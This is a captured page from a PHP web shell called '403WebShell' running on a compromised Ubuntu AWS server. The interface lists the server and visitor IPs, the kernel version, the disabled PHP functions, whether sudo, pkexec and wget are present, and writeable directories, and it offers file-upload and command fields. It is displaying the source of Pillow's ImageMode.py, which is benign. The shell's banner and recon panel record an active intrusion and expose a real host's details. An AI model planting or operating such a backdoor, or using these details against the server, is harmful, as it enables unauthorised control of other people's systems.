Uname:Linux ip-10-0-5-176 6.8.0-1057-aws #60~22.04.1-Ubuntu SMP Wed May 27 08:16:59 UTC 2026 x86_64

403WebShell
403Webshell
Server IP : 3.111.61.48  /  Your IP : 216.73.216.67
Web Server : Apache
System : Linux ip-10-0-5-176 6.8.0-1057-aws #60~22.04.1-Ubuntu SMP Wed May 27 08:16:59 UTC 2026 x86_64
User : ubuntu ( 1000)
PHP Version : 8.2.31
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/lib/python3/dist-packages/PIL/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/lib/python3/dist-packages/PIL/ImageMode.py
#
# The Python Imaging Library.
# $Id$
#
# standard mode descriptors
#
# History:
# 2006-03-20 fl   Added
#
# Copyright (c) 2006 by Secret Labs AB.
# Copyright (c) 2006 by Fredrik Lundh.
#
# See the README file for information on usage and redistribution.
#

# mode descriptor cache
_modes = None


class ModeDescriptor:
    """Wrapper for mode strings."""

    def __init__(self, mode, bands, basemode, basetype):
        self.mode = mode
        self.bands = bands
        self.basemode = basemode
        self.basetype = basetype

    def __str__(self):
        return self.mode


def getmode(mode):
    """Gets a mode descriptor for the given mode."""
    global _modes
    if not _modes:
        # initialize mode cache
        modes = {}
        for m, (basemode, basetype, bands) in {
            # core modes
            "1": ("L", "L", ("1",)),
            "L": ("L", "L", ("L",)),
            "I": ("L", "I", ("I",)),
            "F": ("L", "F", ("F",)),
            "P": ("P", "L", ("P",)),
            "RGB": ("RGB", "L", ("R", "G", "B")),
            "RGBX": ("RGB", "L", ("R", "G", "B", "X")),
            "RGBA": ("RGB", "L", ("R", "G", "B", "A")),
            "CMYK": ("RGB", "L", ("C", "M", "Y", "K")),
            "YCbCr": ("RGB", "L", ("Y", "Cb", "Cr")),
            "LAB": ("RGB", "L", ("L", "A", "B")),
            "HSV": ("RGB", "L", ("H", "S", "V")),
            # extra experimental modes
            "RGBa": ("RGB", "L", ("R", "G", "B", "a")),
            "LA": ("L", "L", ("L", "A")),
            "La": ("L", "L", ("L", "a")),
            "PA": ("RGB", "L", ("P", "A")),
        }.items():
            modes[m] = ModeDescriptor(m, bands, basemode, basetype)
        # mapping modes
        for i16mode in (
            "I;16",
            "I;16S",
            "I;16L",
            "I;16LS",
            "I;16B",
            "I;16BS",
            "I;16N",
            "I;16NS",
        ):
            modes[i16mode] = ModeDescriptor(i16mode, ("I",), "L", "L")
        # set global mode cache atomically
        _modes = modes
    return _modes[mode]

Youez - 2016 - github.com/yon3zu
LinuXploit